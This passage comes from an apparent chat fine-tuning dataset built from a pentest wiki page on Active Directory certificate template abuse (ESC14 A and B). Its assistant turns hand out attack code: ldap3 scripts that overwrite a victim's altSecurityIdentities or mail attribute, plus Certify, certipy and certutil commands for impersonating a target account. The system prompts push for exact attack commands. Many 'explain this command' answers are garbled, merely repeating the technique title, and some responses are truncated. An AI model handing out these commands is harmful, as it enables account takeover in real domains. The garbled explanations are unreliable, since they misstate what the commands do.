operations as numbered steps."}, {"role": "user", "content": "Give me the import command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'altSecurityIdentities':[(ldap3.MODIFY_ADD, '')]}\n)\n\nconn.unbind()"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the import command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'altSecurityIdentities':[(ldap3.MODIFY_ADD, '')]}\n)\n\nconn.unbind()", "metadata": {"corpus_index": 111, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'altSecurityIdentities':[(ldap3.MODIFY_ADD, '')]}\n)\n\nconn.unbind()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'altSecurityIdentities':[(ldap3.MODIFY_ADD, '')]}\n)\n\nconn.unbind()", "metadata": {"corpus_index": 111, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import ldap3`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import ldap3`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 111, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Certify.exe for certificate templates - (esc14 a) write access on altsecurityidentities?"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:Machine /machine"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Certify.exe for certificate templates - (esc14 a) write access on altsecurityidentities?", "response": "Certify.exe request /ca:domain\\ca /template:Machine /machine", "metadata": {"corpus_index": 112, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:Machine /machine"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "Certify.exe request /ca:domain\\ca /template:Machine /machine", "metadata": {"corpus_index": 112, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:domain\\ca /template:Machine /machine`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:domain\\ca /template:Machine /machine`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 112, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the certutil command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx\ncertutil -Dump -v .\\cert-a.pfx"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the certutil command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx\ncertutil -Dump -v .\\cert-a.pfx", "metadata": {"corpus_index": 113, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities"}, {"role": "assistant", "content": "certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx\ncertutil -Dump -v .\\cert-a.pfx"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities", "response": "certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx\ncertutil -Dump -v .\\cert-a.pfx", "metadata": {"corpus_index": 113, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil -MergePFX .\\cert-a.pem .\\cert-a.pfx`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 113, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Get-X509IssuerSerialNumberFormat for certificate templates - (esc14 a) write access on altsecurityidentities?"}, {"role": "assistant", "content": "Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Get-X509IssuerSerialNumberFormat for certificate templates - (esc14 a) write access on altsecurityidentities?", "response": "Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN", "metadata": {"corpus_index": 114, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-X509IssuerSerialNumberFormat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN", "metadata": {"corpus_index": 114, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-X509IssuerSerialNumberFormat -SerialNumber $SERIAL_NUMBER -IssuerDistinguishedName $ISSUER_DN`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 114, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Add-AltSecIDMapping command for certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING\nGet-AltSecIDMapping -DistinguishedName $TARGET_DN"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Add-AltSecIDMapping command for certificate templates - (esc14 a) write access on altsecurityidentities", "response": "Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING\nGet-AltSecIDMapping -DistinguishedName $TARGET_DN", "metadata": {"corpus_index": 115, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Add-AltSecIDMapping"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING\nGet-AltSecIDMapping -DistinguishedName $TARGET_DN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING\nGet-AltSecIDMapping -DistinguishedName $TARGET_DN", "metadata": {"corpus_index": 115, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Add-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 115, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Remove-AltSecIDMapping command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Remove-AltSecIDMapping command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING", "metadata": {"corpus_index": 116, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Remove-AltSecIDMapping"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING", "metadata": {"corpus_index": 116, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Remove-AltSecIDMapping -DistinguishedName $TARGET_DN -MappingString $MAPPING_STRING`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 116, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Certificate templates - (ESC14 B) Target with X509RFC822 (email)"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509RFC822. The attacker can modify the mail attribute of the victim so that it matches the X509RFC822 mapping of the target. It is then possible to enroll on the certificate model with the victim, and use the certificate obtained to authenticate as the target.\n\nFor this attack, a few additional prerequisites are necessary:\n\n::: warning\n> [!WARNING]\n> * The target is a user account\n> * The target already has at least one X509RFC822 mapping in altSecurityIdentities\n> * The attacker has write access to the mail attribute of the victim\n> * The certificate template shows CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag and shows the attribute CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL in msPKI-Certificate-Name-Flag\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n:::\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the mail attribute of the victim can be overwritten to match the X509RFC822 mapping of the target using the following python script.\n\n``python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()\n`\n\nWith certipy, it is then possible to enroll on a certificate template using the victim credentials.\n\n`bash\ncertipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n=== Windows\n\nFrom Windows systems, with PowerShell the mail attribute of the victim must be overwritten to match the email indic"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Certificate templates - (ESC14 B) Target with X509RFC822 (email)", "response": "The target has an explicit weak mapping of type X509RFC822. The attacker can modify the mail attribute of the victim so that it matches the X509RFC822 mapping of the target. It is then possible to enroll on the certificate model with the victim, and use the certificate obtained to authenticate as the target.\n\nFor this attack, a few additional prerequisites are necessary:\n\n::: warning\n> [!WARNING]\n> * The target is a user account\n> * The target already has at least one X509RFC822 mapping in altSecurityIdentities\n> * The attacker has write access to the mail attribute of the victim\n> * The certificate template shows CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag and shows the attribute CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL in msPKI-Certificate-Name-Flag\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n:::\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the mail attribute of the victim can be overwritten to match the X509RFC822 mapping of the target using the following python script.\n\n``python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()\n`\n\nWith certipy, it is then possible to enroll on a certificate template using the victim credentials.\n\n`bash\ncertipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n=== Windows\n\nFrom Windows systems, with PowerShell the mail attribute of the victim must be overwritten to match the email indic", "metadata": {"corpus_index": 117, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC14 B) Target with X509RFC822 (email)?"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509RFC822. The attacker can modify the mail attribute of the victim so that it matches the X509RFC822 mapping of the target. It is then possible to enroll on the certificate model with the victim, and use the certificate obtained to authenticate as the target.\n\nFor this attack, a few additional prerequisites are necessary:\n\n::: warning\n> [!WARNING]\n> * The target is a user account\n> * The target already has at least one X509RFC822 mapping in altSecurityIdentities\n> * The attacker has write access to the mail attribute of the victim\n> * The certificate template shows CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag and shows the attribute CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL in msPKI-Certificate-Name-Flag\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n:::\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the mail attribute of the victim can be overwritten to match the X509RFC822 mapping of the target using the following python script.\n\n``python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()\n`\n\nWith certipy, it is then possible to enroll on a certificate template using the victim credentials.\n\n`bash\ncertipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n=== Windows\n\nFrom Windows systems, with PowerShell the mail attribute of the victim must be overwritten to match the email indic"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC14 B) Target with X509RFC822 (email)?", "response": "The target has an explicit weak mapping of type X509RFC822. The attacker can modify the mail attribute of the victim so that it matches the X509RFC822 mapping of the target. It is then possible to enroll on the certificate model with the victim, and use the certificate obtained to authenticate as the target.\n\nFor this attack, a few additional prerequisites are necessary:\n\n::: warning\n> [!WARNING]\n> * The target is a user account\n> * The target already has at least one X509RFC822 mapping in altSecurityIdentities\n> * The attacker has write access to the mail attribute of the victim\n> * The certificate template shows CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag and shows the attribute CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL in msPKI-Certificate-Name-Flag\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n:::\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the mail attribute of the victim can be overwritten to match the X509RFC822 mapping of the target using the following python script.\n\n``python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()\n`\n\nWith certipy, it is then possible to enroll on a certificate template using the victim credentials.\n\n`bash\ncertipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n=== Windows\n\nFrom Windows systems, with PowerShell the mail attribute of the victim must be overwritten to match the email indic", "metadata": {"corpus_index": 117, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the import syntax for certificate templates - (esc14 b) target with x509rfc822 (email)?"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the import syntax for certificate templates - (esc14 b) target with x509rfc822 (email)?", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()", "metadata": {"corpus_index": 118, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC14 B) Target with X509RFC822 (email) during a pentest?"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC14 B) Target with X509RFC822 (email) during a pentest?", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_dn,\n {'mail':[(ldap3.MODIFY_REPLACE, '')]}\n)\n\nconn.unbind()", "metadata": {"corpus_index": 118, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, 